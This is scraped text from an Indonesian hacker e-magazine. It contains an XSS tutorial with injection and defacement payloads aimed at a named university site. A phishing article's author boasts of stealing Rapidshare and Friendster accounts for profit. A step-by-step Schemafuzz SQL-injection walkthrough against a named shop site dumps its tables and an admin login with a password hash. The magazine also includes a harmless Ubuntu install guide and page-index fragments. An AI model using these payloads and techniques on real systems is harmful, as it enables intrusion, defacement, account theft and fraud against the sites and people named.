Writer : omicron9194 (omicron9194@yahoo.com) Cross Site Scripting atau yang lebih dikenal dengan XSS, sudah sangat banyak di bicarakan. XSS ? Apa itu? XSS adalah suatu cara memasukkan code / script HTML ke dalam suatu web site.Banyak web programmer yang tidak terlalu memperhatikan bahaya XSS, atau mungkin terlalu banyak kesalahan penulisan scripting pada halaman web sehingga mengizinkan beberapa karakter tertentu dijalankan pada situs tersebut. Untuk lebih memahami XSS,perhatikan contoh berikut : http://www.petra.ac.id/search/index.php?q=<script>alert(xss ditemukan)</script>
Site di atas mempunyai kelemahan terhadap XSS.Untuk mengetahui apakah suatu site mempunyai kelemahan XSS,saya tambahkan <script>alert('xss ditemukan')</script> <<< Ini adalah salah satu script untuk melihat apakah suatu site mempunyai kelemahan XSS atau tidak. Kembali ke contoh yang di atas,setelah saya memasukkan script tadi,maka akan muncul popup baru yang berisi xss ditemukan.Nah,dari sini kita mengetahui bahwa site tersebut mempunyai kelemahan XSS (keluarnya popup tadi).Selanjutnya kita bisa mengexploitasi site tersebut. Saya coba ini :
http://www.petra.ac.id/search/index.php?q=<h1><marquee><font color=red>omicron9194 was here</font></marquee></h1>
dan http://www.petra.ac.id/search/index.php?q=<P ALIGN=center><IFRAME SRC=http://protection.6te.net width=777 height=1500></IFRAME></P><h1><marquee>|omicron9194 was here|</marquee></h1>
Karena Script HTML yang tadi kita tulis dapat berjalan maka hal ini lah yang disebut dengan XSS. Lalu apa hanya script HTML saja yang dapat di jalankan? Script yang bisa digunakan untuk XSS adalah HTML,JavaScript,VBScript,ActiveX,Flash. Kita tadi menggunakan dua script,JavaScript dan HTML. Dalam XSS ini,ada dua kemungkinan yang pasti,yaitu : Pertama, script yang kita tambahkan,berjalan di browser kita <<<< Kita berhasil melakukan XSS , jika kita sudah berhasil menampilkan tulisan,maka terserah temen-temen mau diapakan site tersebut selama codenya masih bisa utk XSS :p. Banyak sekali metode XSS yang dapat dilakukan,semua tergantung pada kreativitas masingmasing.Ternyata,XSS cukup bahaya,mengapa? Melalui XSS,kita bisa mencuri password >>> document.cookie Kedua,script yang kita tambahkan tadi,tidak ditampilkan di browser <<<< gagal Kenapa bisa gagal ? Yang membuat kita gagal adalah karena situs tersebut sudah di filter, dengan kata lain server tersebut udah di setting agar tidak melayani permintaan yang mendukung beberapa karakter seperti berikut : Char ; / ? : @ = & # Code %3b %2f %3f %3a %40 %3d %26 %3c %3e %22 %23 Char { } | \ ^ ~ [ ] ` % Code %7b %7d %7c %5c %5e %7e %5b %5d %60 %25 %27 XSS merupakan pilihan yang menarik bagi newbie yang tidak mempunyai shell ato sploit,karena untuk melakukan XSS hanya membutuhkan browser! XSS juga dikatakan oleh temen-temen saya sebagai "just for fun" , why ? Karena untuk melakukan XSS ini, hanya membutuhkan pengetahuan dasar about HTML. Jadi setiap orang dapat dengan mudah melakukan XSS ini :D Mungkin hanya ini saja yang bisa saya jelaskan,semoga artikel ini bermanfaat. Wassalamualaikum... Nick : omicron9194 Email : omicron9194@yahoo.com atau girin@d1gdo.com Website : www.d1gdo.com
Phising Attack
Pengenalan dan Pencegahannya
Writer : Metropolix (metropolix@live.net) Berasal dari kata Fishing yang artinya memancing,sering kali kerap di gunakan para cracker untuk memperoleh informasi pribadi seperti User ID, Password,PIN, nomor rekening bank, nomor kartu kredit Anda secara tidak sah.Dan biasanya data-data tersebut mereka lakukan buat kepentingan pribadi mereka,tidak banyak juga yg merugikan korbankorbannya.mereka yg melakukan aksi tersebut biasanya kerap di panggil dengan sebutan Phiser!!! B-) Apa saja sih kemampuan yg umum di miliki para phiser ini ?
Sebenarnya tidak di butuhkan keahlian khusus untuk melakukan tehnik phising,atau kemampuan yg besar untuk menjebol suatu system keamanan computer.phising banyak di lakukan dengan social engineering, yaitu dengan memanfaatkan kelemahan orang saat mengintepretasikan sebuah informasi di komputer.
Bagaimana mereka melakukan tehnik Phising tersebut ?
Contoh phising yg kerap digunakan adalah dengan menggunakan halaman login palsu suatu website,sehingga para member website tersebut dengan mudah terkecoh dan memasukkan username dan password account mereka ke dalam form login palsu tersebut,yg tidak lain adalah situs palsu yg di buat seolah menyerupai aslinya!.Akan tetapi biasanya kelemahan tehnik yg satu ini adalah dengan dimana kita melihat keanehan pada URL atau LINK website tersebut.
Kita lihat contoh gambar berikut ini :
Yup!! Itu adalah contoh phising pada halaman login yahoo.Bisa kita perhatikan perbedaan URL palsu dan yg asli.He..hehe! Contoh lain lagi pada Rapidshare:
Sudah Jelas bukan,apa keuntungan yg bisa kita ambil dari kerugian orang lain ?! Xixixixixi.. Saya sendiri dalam melakukan phising terhadap Acc Rapidshare dalam sebulannya bisa menghasilkan uang sekitar 2 jutaan. Seberapa bahayakah phising ini ?
Bisa kamu bayangkan jika yg kita dapatkan adalah sejumblah data informasi kartu credit,no Pin,data private member,Data penjualan (termasuk gak yah ?? ..wakakaka ),apapun itu.yg jelas phising ini bisa menimbulakan efek negatife ke korbannya! Kita lihat saja Belakangan ini phising yg marak terjadi pada situs yg lagi nge trend di kalangan netters muda (lagak gw.. udah kayak paling tua ajah,,Jiakakaka..).Phising pada situs FRIENDSTER .
Testing saya dalam phising terhadap Friendster ini dalam satu harinya bisa menghasilkan sekitar 40 acc member!! O__O (tapi gak ada yg gw obrak-abrik loh Cuma sekedar pengen tahu ajahXixixixi! ) Ok semuanya ..itu tadi sedikit info mengenai phising dari gw. Mohon maaf apabila ada kekurangan atau salah kata dalam menuliskan artikel ini.saya sendiri masih sangat newbie dan membutuhkan bimbingan dari semuanya.. Just Share And Learn !!!
Salam hangat metropolix ~
mailto:metropolix@live.com
thanks to :
[] Hackers center [] Balikita [] Yogyafree [] Gorontalo defacer []
| gblack a.k.a biadabz | blok_underground a.k.a om rizal | bL4Ck_3n91n3 | UnderDos | tukulesto |
| ramz | coco_nakal | agitama a.ka. deathromeo | indomie | okacybernet | mamet tosa | www.andrea-metropolix.com
Bedah Web With Schemafuzz

SQL Injection Dengan Metode Schemafuzz
Writer : omicron9194 (omicron9194@yahoo.com)
Bahan-bahan yg harus disiapkan : 1. Python , donlot di http://www.python.org/ftp/python/2.5/python-2.5.msi 2. Schemafuzz >>> http://darkc0de.com/others/schemafuzz.py 3. CMD Gunakan CMD , masuk ke folder schemafuzz.py Dengan perintah >> schemafuzz.py -u "target" --perintah Utk lebih jelasnya,,langsung ke TKP ,, xixixixixi 1.Cari target ,, ini target kita >>> http://www.sleeppost.com/viewproduct.php?pid=923 2.Cek columnnya schemafuzz.py -u "http://www.sleeppost.com/viewproduct.php?pid=923" findcol maka akan keluar :
=================================================================================== +] URL: http://www.sleeppost.com/viewproduct.php?pid=923-+] Evasion Used: "+" "--" +] 09:44:10 -] Proxy Not Given +] Attempting To find the number of columns... +] Testing: 0,1,2,3,4,5,6, +] Column Length is: 7 +] Found null column at column #: 0 +] SQLi URL: http://www.sleeppost.com/viewproduct.php?pid=923+AND+1=2+UNION+SEL CT+0,1,2,3,4,5,6-+] darkc0de URL: http://www.sleeppost.com/viewproduct.php?pid=923+AND+1=2+UNION SELECT+darkc0de,1,2,3,4,5,6 -] Done! =================================================================================== Nah kita gunakan ini http://www.sleeppost.com/viewproduct.php?pid=923+AND+1=2+UNION+ SELECT+darkc0de,1,2,3,4,5,6 utk nginject.
3.Cari db nya schemafuzz.py -u "http://www.sleeppost.com/viewproduct.php?pid=923+AND+1=2+UNION+ SELECT+darkc0de,1,2,3,4,5,6" --dbs
=================================================================================== [+] URL: http://www.sleeppost.com/viewproduct.php?pid=923+AND+1=2+UNION+SELECT+d arkc0de,1,2,3,4,5,6-[+] Evasion Used: "+" "--" [+] 09:56:47 [-] Proxy Not Given [+] Gathering MySQL Server Configuration... Database: sleeppo_store User: sleeppo_admin@web.readyserver.net Version: 5.0.67-log [+] Showing all databases current user has access too! [+] Number of Databases: 1 [0] ??sleeppo_store? [-] 09:57:00 [-] Total URL Requests 3 [-] Done =================================================================================== Tuh kan keliatan db nya,, wkwkwkkwk sleeppo_store 4. Cari nama tabel dalam db schemafuzz.py -u "http://www.sleeppost.com/viewproduct.php?pid=923+AND+1=2+UNION+ SELECT+darkc0de,1,2,3,4,5,6" --schema -D sleeppo_store
Ni yg lengkapnya :
=================================================================================== [+] URL: http://www.sleeppost.com/viewproduct.php?pid=923+AND+1=2+UNION+SELECT+d arkc0de,1,2,3,4,5,6-[+] Evasion Used: "+" "--" [+] 10:02:56 [-] Proxy Not Given [+] Gathering MySQL Server Configuration... Database: sleeppo_store User: sleeppo_admin@web.readyserver.net Version: 5.0.67-log [+] Showing Tables & Columns from database "sleeppo_store" [+] Number of Tables: 20 [Database]: sleeppo_store [Table: Columns] [0]advertisement: id,image,url [1]brands: name [2]category: cid,parent,name [3]config: adminemail1,adminemail2,adminemail3,salesemail,enquiryemail,adminlogi n,adminpassword,orderemailsubject,orderemailheader,orderemailfooter,orderwebhead er,orderwebfooter,sms [4]emailgroup: gid,name [5]emailgroupmember: gid,email [6]emails: email,name [7]faqreply: fid,faqquestion,faqanswer,fdate [8]faqrequest: fid,email,faqquestion,fdate,status,name,contact [9]news: nid,title,detail,ndate,link_cid,link_pid,active [10]orderitem: ordernum,pid,pname,vid,brand,variance,price,sellprice,discount,qty,type [11]orders: ordernum,name,email,contact,address,status,country,ddate,dname,demai l,dcontact,daddress,dcountry,paytype,worldpayid,ttime,remarks,refno,deliverydate ,deliverytime,paymentmode,remarks2 [12]outlet: outlet_id,outlet_name,outlet_address,outlet_tel [13]product: pid,cid,brand,name,pno,detail,recommend [14]productrel: pid,vtype,variance [15]productvariance: vid,pid,variance,thick,vtype,vno,detail,price,sellprice,firm,colour [16]promotionitems: id,promotion_id,item_type,cid,brand,pid,vid,discount,rating [17]promotions: promotion_id,title,detail,startdate,enddate [18]users: uid,name,email,contact,address [19]warranty: wid,name,address,email,submitdate,date,invoice,model,size,period,survey,qty [-] 10:24:51 [-] Total URL Requests 139 [-] Done ===================================================================================
Berarti itu site punya 20 tabel,kolomnya juga ada tuh.Tinggal pilih yg mana yg mau di exploit :p 5. Exploit tabel n kolom =================================================================================== schemafuzz.py -u "http://www.sleeppost.com/viewproduct.php?pid=923+AND+1=2+UNION+ SELECT+darkc0de,1,2,3,4,5,6" --dump -D sleeppo_store -T config -C adminlogin,adminpassword ===================================================================================
=================================================================================== [+] URL: http://www.sleeppost.com/viewproduct.php?pid=923+AND+1=2+UNION+SELECT+d arkc0de,1,2,3,4,5,6-[+] Evasion Used: "+" "--" [+] 10:36:59 [-] Proxy Not Given
[+] Gathering MySQL Server Configuration... Database: sleeppo_store User: sleeppo_admin@web.readyserver.net Version: 5.0.67-log [+] Dumping data from database "sleeppo_store" Table "config" [+] and Column(s) ['adminlogin', 'adminpassword'] [+] Number of Rows: 3 [0] liphong:16a8c2870e2d639a58e46bfd58ff9c5c:NoDataInColumn: : ' onmouseover="inPr oduct(:NoDataInColumn:liphong:16a8c2870e2d639a58e46bfd58ff9c5c:NoDataInColumn: ) " onmouseout='outProduct(:NoDataInColumn:liphong:16a8c2870e2d639a58e46bfd58ff9c5 c:NoDataInColumn: )'><td width='30%' style='padding:6px' ><a href='./viewproduct .php?pid=:NoDataInColumn:liphong:16a8c2870e2d639a58e46bfd58ff9c5c:NoDataInColumn : '><img src='./images/smalllogo.gif' border='1' style='border-color:#cccccc;z-i ndex:1'></a></td> <td width='80%' style='padding-left:20px;padding:6px'><b><a href='./viewproduct. php?pid=:NoDataInColumn:liphong:16a8c2870e2d639a58e46bfd58ff9c5c:NoDataInColumn: &pv='>3</a></b> <br><br>5<br /><br /><div style='float:right;background:url(./images/pricetag.gi f) no-repeat;width:100px;height:42px;margin-top:5px;cursor:pointer' onclick='pri ceClick(:NoDataInColumn:liphong:16a8c2870e2d639a58e46bfd58ff9c5c: [1] No data [2] No data [3] No data [-] 10:37:36 [-] Total URL Requests 5 [-] Done =================================================================================== Liat tulisan yg saya tebalkan ,,xixixi...itu user ama passnya udah kliatan,,passnya tgl di decrypt aja ;) Cara diatas berlaku untuk sql versi 5 , utk versi 4 gunakan perintah --fuzz untuk menemukan nama tabel n kolom ex: =================================================================================== schemafuzz.py -u "http://www.sleeppost.com/viewproduct.php?pid=923+AND+1=2+UNION+ SELECT+darkc0de,1,2,3,4,5,6" --fuzz ===================================================================================
Beberapa perintah : --fuzz >>> mencari nama kolom n tabel pada sql v 4 --schema >>> melihat nama tabel --dump >>> melihat isi kolom --findcol >>> menemukan dakc0de ( colom ) Silahkan cari yg laen. Baca aja help nya :p Semoga bermaanfaat :)
Instalasi Ubuntu 8.10 (Intrepid Ibex)

Migrasi dari Windows ke Linux
Writer : Equal (equalisme@gmail.com) #first Linux Untuk Umat Manusia "Ubuntu" berasal dari bahasa kuno Afrika, yang berarti "rasa perikemanusian terhadap sesama manusia". Ubuntu juga bisa berarti "aku adalah aku karena keberadaan kita semua". Tujuan dari distribusi Linux Ubuntu adalah membawa semangat yang terkandung di dalam Ubuntu ke dalam dunia perangkat lunak. Diatas merupakan sedikit synopsis dari OS ini, yah, kita berharap (tidak hanya berharap,tapi juga bertindak) semoga Linux ini dapat mencapai misi yang telah ditetapkan. Dan alasan saya membahas tentang OS ini adalah karena saya mengambil Mata Kuliah Sistem Operasi dan pada mata kuliah ini akan mempunyai Tugas Praktek yang mengharuskan kami menggunakan Linux sebagai sarana pembelajaran. Ubuntu versi ini saya download dari http://www.ubuntu-id.org/ubuntu/download, bagi para pembaca yang mempunyai bandwith yang sangat lebar dapat langsung mendownload pada link mirror yang telah disediakan. Sedangkan bagi anda yang tidak dapat mendownload langsung Ubuntu mempunyai Program pengiriman CD gratis yang dapat anda lihat syarat syaratnya di sini http://www.ubuntuid.org/ubuntu/shipit . #keterangan hardware 1. 2. 3. 4. 5. 6. 7. Monitor 17 1 buah PC dengan spesifikasi Prosesor Intel Dual Core 1,66 GHz HDD 160 GB VGA 128 MB RAM 1024 MB DVD-RAM
#keterangan software Untuk memasang Ubuntu ini pada computer saya menggunakan Virtual Machine yang berjalan diatas OS Windows XP Profesional Service Pack 3 (fully updated) yaitu Sun xVM Virtual Box yang bisa anda download di http://www.virtualbox.org/wiki/Downloads.
Mungkin ada pertanyaan kenapa menggunakan Virtual Machine tidak langsung diinstal saja pada PC tersebut? Pertama alasan saya menggunakan ini adalah : 1. Lebih mempermudah dalam pengetesan OS (bug,crash,error,dll) 2. Lebih hemat dalam penggunaan hardware 3. Tidak mengganggu Host OS jadi Linux hanya bertindak sebagai Guest OS (tidak berhubungan sama sekali dengan OS yang digunakan yaitu Windows XP SP3. #instalasi Dalam penginstalan Ubuntu ini hanya mempunyai beberapa step/ langkah langkah yang harus dilakukan, dan saya jamin langkah - langkah itu tidak lebih dari 15 langkah. 1. Masukkan Live CD Ubuntu 8.10 anda kedalam drive cd-rom, sebelumnya anda harus merubah boot order agar computer anda memboot melalui cd-rom. 2. Akan keluar tampilan awal dibagian ini anda diminta memilih bahas yang akan digunakan, disini saya memilih bahasa default yaitu English. 3. Kemudian akan keluar beberapa pilihan,saya akan memilih pilihan a. a. Try Ubuntu without change to your computer b. Instal Ubuntu Tunggu sampai loading selesai, setelah selesai anda akan sampai di halaman desktop ubuntu 4. Dihalaman awal ini ada icon yang bertuliskan install, klik 2x pada icon tersebut. 5. Sampai keluar windownya akan ada 7 step yang harus dilewati untuk menginstal ubuntu ini pada computer anda. a. Pada step ini anda diminta bahasa yang ingin anda gunakan pada ubuntu anda, pada step ini saya memilih bahasa inggris. Setelah bahasa yang diinginkan terpilih, klik forward (Alt + F). b. Di step ini anda diminta memilih region/wilayah tempat tinggal anda, pada step ini saya memilih Jakarta Indonesia, kemudian klik forward. c. Di step ke-3 ini anda akan diminta memilih layout/tampilan dari keyboard anda, disini saya sarankan menggunakan layout dari USA yang sudah merupakan standard yang digunakan pada hampir semua keyboard yang ada di Indonesia. Setelah selesai memilih klik forward kembali. d. Pada window ini anda diminta untuk memilih bagaimana pembagian hdd anda untuk tempat penginstalan ubuntu ini. Pada step ini ada 2 pilhan yang bisa dipilih, yaitu :
Guided use entire disk Pada opsi ini anda akan dituntun seluruhnya dalam pembagian hdd anda. Manual Dan pada opsi ini anda secara manual dalam pembagian hdd anda. (hanya disarankan bagi anda yang sudah cukup mengerti seluk beluk linux). Karena apabila salah dalam mengatur pembagian hdd anda dapat mengakibatkan kehilangan data penting yang berada pada hdd anda. e. Disini saya asumsikan anda memilih opsi Guided use entire disk klik forward. Setelah memilih anda akan langsung dihadapkan pada beberapa kotak yang wajib anda isi, yaitu : What is your name? Kotak ini meminta anda memasukkan nama yang ingin anda gunakan sebagai identitas didalam computer nanti. Disini saya menggunakan nama Equal. What name do you want to use to log in? Kotak ini meminta anda memasukkan nama yang akan digunakan untuk username anda nantinya, untuk log in. disini saya juga menggunakan nama Equal (dalam huruf kecil) Choose a password to keep your account safe Anda diminta memasukkan password yang akan digunakan untuk username yang telah anda pilih (anda wajib memasukkan password). Pada kotak in anda wajib memasukkan 2x password yang anda pilih, untuk memastikan anda mengingat dengan baik password yang anda masukkan. Pada bagian ini saya menggunakan password equalisme What the name of this computer Disini anda diminta memasukkan nama dari computer yang akan anda gunakan. Saya menggunakan nama vbox. Terakhir pada step ini ada sebuah check box (Log in automatically) yang apabila anda men-check checkbox ini maka ubuntu akan mengingat username dan password anda (yang sangat tidak saya sarankan, berkaitan dengan hal security). f. Ini merupakan step terakhir dari penginstalan ubuntu 8.10 pada computer anda, pada step ini anda wajib memeriksa kembali semua pilihan anda dengan membaca laporan dari semua setting-an yang telah anda pilih. Setelah semua sesuai dengan yang anda inginkan maka tekan pilihan Install. Silahkan ditunggu sampai proses dari penginstalan ini selesai.
g. Setelah selesai maka akan muncul sebuah window yang menginformasikan bahwa instalasi ubuntu ini telah selesai. Dan pada jendela ini aka nada 2 pilihan yaitu tetap melanjutkan menggunakan live cd (continue using live cd) atau me-restart computer anda agar dapat langsung menggunakan ubuntu yang telah di instal tadi (restart now). Disini saya memilih agar ubuntu langsung merestart dirinya, klik Restart now. #last Demikian tutorial saya tentang cara menginstal ubuntu 8.10 ini, masih banyak hal hal teknik yang belum dibahas dalam tutorial ini. Dan apabila ada kesalahan di dalam tutorial ini (dan saya yakin pasti ada) mohon mengirimkan kritik dan saran ke equalisme@gmail.com. Terakhir saya ucapkan terimakasih karena anda telah berkenan membaca tutorial dari saya ini. Salam Equal #shout & greets Teman teman di Himpunan Mahasiswa Teknik Perangkat Lunak (HMPL) TPL Angkatan 2008 terutama Boedas Team. [saran & kritik] email me at : equalisme@gmail.com atau ke web Equal [about me] mahasiswa disebuah perguruan tinggi, moderator di forum.hackers-center.org, administrator di forum.sman2palangkaraya.com, dan manusia biasa yang pasti mempunyai banyak kelemahan serta kekurangan .
HC eMagazine Writer
Ketentuan Menjadi Penulis HC eMagazine
Berminat menjadi penulis di HC eMagazine edisi berikutnya? Apabila anda berminat jangan ragu-ragu untuk mengirimkan artikel anda ke redaksi HC eMagazine. Artikel harus asli tulisan anda, kalaupun itu bukan buatan anda harus mencantumkan sumber asli anda mendapatkan artikel tersebut. silahkan kirim artikel anda dengan ketentuan sebagai berikut : Materi yang ditentukan : Kategori Komputer & Internet Kategori Pemograman / Coding Kategori Hacking & Cracking Kategori Phising & Phreaking Kategori Handphone Kirimkan tulisan anda dengan format : Format File : .doc Page Setup : Paper size = Letter atau A4 Line spacing : single Font : Arial atau Calibri, size 12 Kirimkan tulisan ke Redaksi HC eMagazine : 1. ciebal745@gmail.com 2. luthfi_tech@yahoo.com 3. rama_games@yahoo.com 4. Death_Note17@yahoo.com Subject : HC eMagazine <judul tutorial> Attachment : JudulTutorAnda.zip atau JudulTutorAnda.rar (pilih salah satu saja). Tidak menerima file download di ziddu, rapidshare, 4shared, dll. (jika ukurannya besar di perbolehkan disimpan di hosting seperti ripway, fileAve, Geocities, dll) Artikel akan diseleksi. Jika sesuai dengan kriteria, maka akan kami publish di HC eMagazine edisi berikutnya. Redaksi HC berhak mengedit isi tulisan sesuai kebutuhan. Terima kasih.
Redaksi HC eMagazine
Lampiran :
Serba Serbi HC eMagazine
Logo-Logo Hackers-Center

Hacker Emagazine Vol.1 - 2

Diunggah oleh

Informasi Dokumen

Judul Asli

Hak Cipta

Format Tersedia

Bagikan dokumen Ini

Bagikan atau Tanam Dokumen

Opsi Berbagi

Apakah menurut Anda dokumen ini bermanfaat?

Apakah konten ini tidak pantas?

Hak Cipta:

Format Tersedia

Hacker Emagazine Vol.1 - 2

Diunggah oleh

Hak Cipta:

Format Tersedia

www.hackers-center.

Hackers-Center 2009 HC eMagazine Vol. 01

Hackers-Center 2009 HC eMagazine Vol. 01

Hackers-Center 2009 HC eMagazine Vol. 01

Situs phpBB.com Under Attacker

Hackers-Center 2009 HC eMagazine Vol. 01

Defacer kena Deface

Hackers-Center 2009 HC eMagazine Vol. 01

Apa Adsense itu..?

Hackers-Center 2009 HC eMagazine Vol. 01

Hackers-Center 2009 HC eMagazine Vol. 01

Hackers-Center 2009 HC eMagazine Vol. 01

Nature Illusion Studio

Hackers-Center 2009 HC eMagazine Vol. 01

- 10- HC eMagazine Spirit # 01

Hackers-Center 2009 HC eMagazine Vol. 01

- 11- HC eMagazine Spirit # 01

Hackers-Center 2009 HC eMagazine Vol. 01

- 12- HC eMagazine Spirit # 01

maka akan terlihat tampilan utama yang simpel seperti ini :

Hackers-Center 2009 HC eMagazine Vol. 01

- 13- HC eMagazine Spirit # 01

Sekarang lo bisa edit semau lo dan dengan desain lo sendiri.

Hackers-Center 2009 HC eMagazine Vol. 01

- 14- HC eMagazine Spirit # 01

SQL Injection Basic Tutorial

Hackers-Center 2009 HC eMagazine Vol. 01

- 15- HC eMagazine Spirit # 01

Hackers-Center 2009 HC eMagazine Vol. 01

- 16- HC eMagazine Spirit # 01

- 17- HC eMagazine Spirit # 01

Hackers-Center 2009 HC eMagazine Vol. 01

- 18- HC eMagazine Spirit # 01

USB WiFi TP-Link

Hackers-Center 2009 HC eMagazine Vol. 01

- 19- HC eMagazine Spirit # 01

root@HC A.K.A chepoek chepoek_agie@yahoo.com

Hackers-Center 2009 HC eMagazine Vol. 01

- 20- HC eMagazine Spirit # 01

Sekarang lo pilih themes yang lo inginin, (yang ada tombol Buy)

Hackers-Center 2009 HC eMagazine Vol. 01

- 21- HC eMagazine Spirit # 01

Hackers-Center 2009 HC eMagazine Vol. 01

- 22- HC eMagazine Spirit # 01

Lalu apa yang terjadi..?

Hackers-Center 2009 HC eMagazine Vol. 01

- 23- HC eMagazine Spirit # 01

Hackers-Center 2009 HC eMagazine Vol. 01

- 24- HC eMagazine Spirit # 01

Hackers-Center 2009 HC eMagazine Vol. 01

- 25- HC eMagazine Spirit # 01

SQL Injection by Xyberbreaker

- 26- HC eMagazine Spirit # 01

Hackers-Center 2009 HC eMagazine Vol. 01

- 27- HC eMagazine Spirit # 01

Hackers-Center 2009 HC eMagazine Vol. 01

- 28- HC eMagazine Spirit # 01

- 29- HC eMagazine Spirit # 01

Hackers-Center 2009 HC eMagazine Vol. 01

- 30- HC eMagazine Spirit # 01

- 31- HC eMagazine Spirit # 01

Hackers-Center 2009 HC eMagazine Vol. 01

- 32- HC eMagazine Spirit # 01